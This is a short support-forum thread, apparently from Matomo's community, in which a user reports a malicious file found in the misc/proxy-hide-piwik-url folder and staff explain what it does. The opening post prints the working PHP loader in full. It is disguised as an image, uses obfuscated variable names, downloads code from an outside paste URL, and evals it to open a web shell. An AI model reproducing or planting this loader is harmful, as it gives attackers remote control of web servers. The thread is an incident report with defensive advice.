Malware after latest update

Criss · March 25, 2025, 4:08pm

I got a malware under a folder named "proxy-hide-piwik-url, containing a file containing this code:

%PNG
<?php 
${"GLOBALS"}["delves"]="love";
${"GLOBALS"}["0xfah"]="you";
error_reporting(0);
set_time_limit(0);
${"GLOBALS"}["i"]="love";
${"GLOBALS"}["haxor"]="love";
${${"GLOBALS"}["haxor"]}=curl_init();
${"GLOBALS"}["world"]="love";
${"GLOBALS"}["Thxngfa"]="love";
curl_setopt(${${"GLOBALS"}["i"]},
CURLOPT_URL,"https://paste.ee/r/MBkVN/0");
curl_setopt(${${"GLOBALS"}["world"]},CURLOPT_RETURNTRANSFER,1);
${${"GLOBALS"}["0xfah"]}=curl_exec(${${"GLOBALS"}["delves"]});
curl_close(${${"GLOBALS"}["Thxngfa"]});
eval("?>".${${"GLOBALS"}["0xfah"]});
?>

heurteph-ei · March 25, 2025, 4:22pm

Hi @Criss
Could you give us the path of this file in the Matomo distribution?
@SteveG @Altamash_Shaikh @MisterGenest maybe you can have a look?

Criss · March 25, 2025, 4:38pm

sure, the path is mymatomo/misc/proxy-hide-piwik-url/asuh.jpg.php
I have now deleted the file and my Matomo seems working all right (it was also working before) but I wonder if even the folder “proxy-hide-piwik-url” is a hack (it now contains only a “README.md” file)

SteveG · March 25, 2025, 5:05pm

Hey @Criss,

Matomo actually contains that folder. But in there only a README.md file should be located. Everything else is not part of our default packages.

If someone was able to place a malformed file there you should take further steps to safeguard your server.
The script you posted above loads and executes some sort of bypass shell, which might allow to modify or execute other files on the server.

For Matomo you can run the system check to see if any files provided by Matomo itself were manipulated. But it might be better to also ensure other Software on your webspace is secure and maybe also change passwords…

Criss · March 25, 2025, 5:32pm

thanks for checking and giving prompt feedback